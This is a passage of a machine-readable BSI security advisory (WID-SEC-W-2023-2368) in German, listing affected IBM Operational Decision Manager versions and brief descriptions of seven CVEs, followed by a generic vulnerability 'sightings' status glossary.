"category": "external", "summary": "Red Hat Security Advisory RHSA-2023:6138 vom 2023-10-26", "url": "https://access.redhat.com/errata/RHSA-2023:6138" }, { "category": "external", "summary": "IBM Security Bulletin 7105614 vom 2024-01-08", "url": "https://www.ibm.com/support/pages/node/7105614" } ], "source_lang": "en-US", "title": "IBM Operational Decision Manager: Mehrere Schwachstellen", "tracking": { "current_release_date": "2024-01-07T23:00:00.000+00:00", "generator": { "date": "2024-02-15T17:44:18.727+00:00", "engine": { "name": "BSI-WID", "version": "1.3.0" } }, "id": "WID-SEC-W-2023-2368", "initial_release_date": "2023-09-14T22:00:00.000+00:00", "revision_history": [ { "date": "2023-09-14T22:00:00.000+00:00", "number": "1", "summary": "Initiale Fassung" }, { "date": "2023-10-26T22:00:00.000+00:00", "number": "2", "summary": "Neue Updates von Red Hat aufgenommen" }, { "date": "2024-01-07T23:00:00.000+00:00", "number": "3", "summary": "Neue Updates von IBM aufgenommen" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "IBM Operational Decision Manager \u003c 8.10.5.1", "product": { "name": "IBM Operational Decision Manager \u003c 8.10.5.1", "product_id": "T029909", "product_identification_helper": { "cpe": "cpe:/a:ibm:operational_decision_manager:8.10.5.1" } } }, { "category": "product_name", "name": "IBM Operational Decision Manager \u003c 8.11.0.1", "product": { "name": "IBM Operational Decision Manager \u003c 8.11.0.1", "product_id": "T029910", "product_identification_helper": { "cpe": "cpe:/a:ibm:operational_decision_manager:8.11.0.1" } } }, { "category": "product_name", "name": "IBM Operational Decision Manager \u003c 8.11.1", "product": { "name": "IBM Operational Decision Manager \u003c 8.11.1", "product_id": "T029911", "product_identification_helper": { "cpe": "cpe:/a:ibm:operational_decision_manager:8.11.1" } } }, { "category": "product_name", "name": "IBM 
Operational Decision Manager \u003c 8.12.0", "product": { "name": "IBM Operational Decision Manager \u003c 8.12.0", "product_id": "T029912", "product_identification_helper": { "cpe": "cpe:/a:ibm:operational_decision_manager:8.12.0" } } }, { "category": "product_name", "name": "IBM Operational Decision Manager 8.10.5.1 \u003c IF049", "product": { "name": "IBM Operational Decision Manager 8.10.5.1 \u003c IF049", "product_id": "T031894", "product_identification_helper": { "cpe": "cpe:/a:ibm:operational_decision_manager:8.10.5.1__if049" } } } ], "category": "product_name", "name": "Operational Decision Manager" } ], "category": "vendor", "name": "IBM" }, { "branches": [ { "category": "product_name", "name": "Red Hat Enterprise Linux", "product": { "name": "Red Hat Enterprise Linux", "product_id": "67646", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:-" } } } ], "category": "vendor", "name": "Red Hat" } ] }, "vulnerabilities": [ { "cve": "CVE-2022-2047", "notes": [ { "category": "description", "text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht in der HttpURI-Klasse der Eclipse Jetty-Komponente. Durch das Senden einer speziell gestalteten Anfrage kann ein Angreifer diese Schwachstelle ausnutzen, um die Sicherheitsma\u00dfnahmen zu umgehen." } ], "product_status": { "known_affected": [ "T031894", "67646" ] }, "release_date": "2023-09-14T22:00:00Z", "title": "CVE-2022-2047" }, { "cve": "CVE-2014-0107", "notes": [ { "category": "description", "text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht in der Apache Xalan-Java-Komponente aufgrund einer unsachgem\u00e4\u00dfen Behandlung von Ausgabeeigenschaften. Ein entfernter Angreifer kann diese Schwachstelle zur Umgehung von Sicherheitsma\u00dfnahmen ausnutzen." 
} ], "product_status": { "known_affected": [ "T031894", "67646" ] }, "release_date": "2023-09-14T22:00:00Z", "title": "CVE-2014-0107" }, { "cve": "CVE-2022-25881", "notes": [ { "category": "description", "text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht im Node.js http-cache-semantics-Modul aufgrund eines Denial of Service (ReDoS) durch regul\u00e4re Ausdr\u00fccke. Durch das Senden einer speziell gestalteten Regex-Eingabe unter Verwendung von Request-Header-Werten kann ein entfernter Angreifer diese Schwachstelle ausnutzen, um einen Denial-of-Service-Zustand zu verursachen." } ], "product_status": { "known_affected": [ "T031894", "67646" ] }, "release_date": "2023-09-14T22:00:00Z", "title": "CVE-2022-25881" }, { "cve": "CVE-2022-34169", "notes": [ { "category": "description", "text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht in der Apache Xalan Java XSLT Bibliothekskomponente aufgrund eines Integer Truncation Problems bei der Verarbeitung von b\u00f6sartigen XSLT Stylesheets. Ein entfernter Angreifer kann diese Schwachstelle zur Ausf\u00fchrung von beliebigem Code ausnutzen" } ], "product_status": { "known_affected": [ "T031894", "67646" ] }, "release_date": "2023-09-14T22:00:00Z", "title": "CVE-2022-34169" }, { "cve": "CVE-2022-41946", "notes": [ { "category": "description", "text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht in der Postgresql JDBC-Komponente aufgrund eines nicht eingeschr\u00e4nkten Zugriffs zum Erstellen lesbarer Dateien im TemporaryFolder. Durch das Senden einer speziell gestalteten Anfrage kann ein Angreifer diese Schwachstelle ausnutzen, um vertrauliche Informationen offenzulegen." 
} ], "product_status": { "known_affected": [ "T031894", "67646" ] }, "release_date": "2023-09-14T22:00:00Z", "title": "CVE-2022-41946" }, { "cve": "CVE-2023-34034", "notes": [ { "category": "description", "text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht in der Komponente VMware Tanzu Spring Security aufgrund einer unsachgem\u00e4\u00dfen Validierung von Benutzereingaben. Mit einer speziell gestalteten Konfiguration kann ein Angreifer diese Schwachstelle ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen." } ], "product_status": { "known_affected": [ "T031894", "67646" ] }, "release_date": "2023-09-14T22:00:00Z", "title": "CVE-2023-34034" }, { "cve": "CVE-2023-37460", "notes": [ { "category": "description", "text": "Es besteht eine Schwachstelle in IBM Operational Decision Manager. Dieser Fehler besteht in der Komponente Plexus Archiver aufgrund der Verfolgung eines symbolischen Links in der Funktion resolveFile(). Durch Extrahieren einer speziell gestalteten Archivdatei, die einen symbolischen Link enth\u00e4lt, mit AbstractUnArchiver kann ein Angreifer diese Schwachstelle ausnutzen, um beliebigen Code auszuf\u00fchren." } ], "product_status": { "known_affected": [ "T031894", "67646" ] }, "release_date": "2023-09-14T22:00:00Z", "title": "CVE-2023-37460" } ] }
Sightings
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.